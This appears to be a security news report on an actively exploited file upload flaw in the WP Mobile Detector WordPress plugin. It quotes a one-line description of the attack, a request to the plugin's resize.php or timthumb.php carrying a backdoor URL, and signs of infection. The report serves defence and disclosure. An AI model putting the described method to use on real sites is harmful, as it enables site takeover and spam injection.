Researchers at Sucuri are reporting that the WP Mobile Detector plugin has been patched for an arbitrary file upload vulnerability that is being actively exploited in the wild. The plugin, which was temporarily removed from the WordPress Plugin Directory, had more than 10,000 active installs before the exploits began.
According to Sucuri, the majority of compromised sites have been infected with porn-related spam via the plugin’s resizing script, which fails to validate and sanitize input:
The vulnerability is very easy to exploit, all the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb, in this case it just includes resize.php), inside the plugin directory with the backdoor URL.
Sucuri offered tips on recognizing if a site has been compromised by this particular vulnerability:
You can usually find the gopni3g directory in the site root, that contains story.php (doorway generator script), .htaccess and subdirectories with spammy files and templates.
The vulnerability was originally published on the Plugin Vulnerabilities website on May 31st, but Sucuri’s logs show that it has been actively exploited in the wild since May 27th.
Because the vulnerability was disclosed before the plugin was patched, security experts advised users to uninstall the plugin. As of today, the number of active installs has dropped from 10,000+ to 2,000+ as the result of the exploits.